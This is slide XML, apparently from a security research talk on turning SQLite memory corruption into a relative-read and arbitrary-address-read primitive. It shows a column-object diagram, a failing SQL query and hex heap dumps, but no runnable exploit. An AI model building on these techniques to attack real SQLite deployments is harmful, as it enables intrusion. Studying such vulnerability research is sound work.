            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEST_COLUMN_NAME</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Curved Connector 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7211983" y="4768940"/>
            <a:ext cx="1194695" cy="799228"/>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7007303"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20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30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40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50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60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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>71</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="4361657"/>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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068614" y="5765902"/>
            <a:ext cx="2280660" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EST_COLUMN_NAME</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Curved Connector 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7211983" y="4768940"/>
            <a:ext cx="1194695" cy="799228"/>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gdb iconì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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84295" y="3826272"/>
            <a:ext cx="1280320" cy="1280320"/>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p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="3"/>
            <a:endCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864615" y="4466432"/>
            <a:ext cx="2375943" cy="0"/>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3309296"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20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30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40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50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60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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>71</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210003" y="405760"/>
            <a:ext cx="5086022" cy="3724096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SELECT TEST_COLUMN_NAME FROM table1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: no such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column: TEST_COLUMN_NAME</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="4361657"/>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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068614" y="5765902"/>
            <a:ext cx="2280660" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EST_COLUMN_NAME</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Curved Connector 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7211983" y="4768940"/>
            <a:ext cx="1194695" cy="799228"/>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6973569"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20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30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40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50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60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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>71</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276678" y="405760"/>
            <a:ext cx="4564285" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Relative Read &amp; AAR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>primitive found! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="4361657"/>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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068614" y="5765902"/>
            <a:ext cx="2280660" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EST_COLUMN_NAME</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Curved Connector 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7211983" y="4768940"/>
            <a:ext cx="1194695" cy="799228"/>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0619327"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>58 24 A2 43 AA 7F 00 00 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 10 21 FA 01 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 43 B1 20 C3 21 00 00 20 43 B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 00 00 00 00 00 00 00 08 42 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
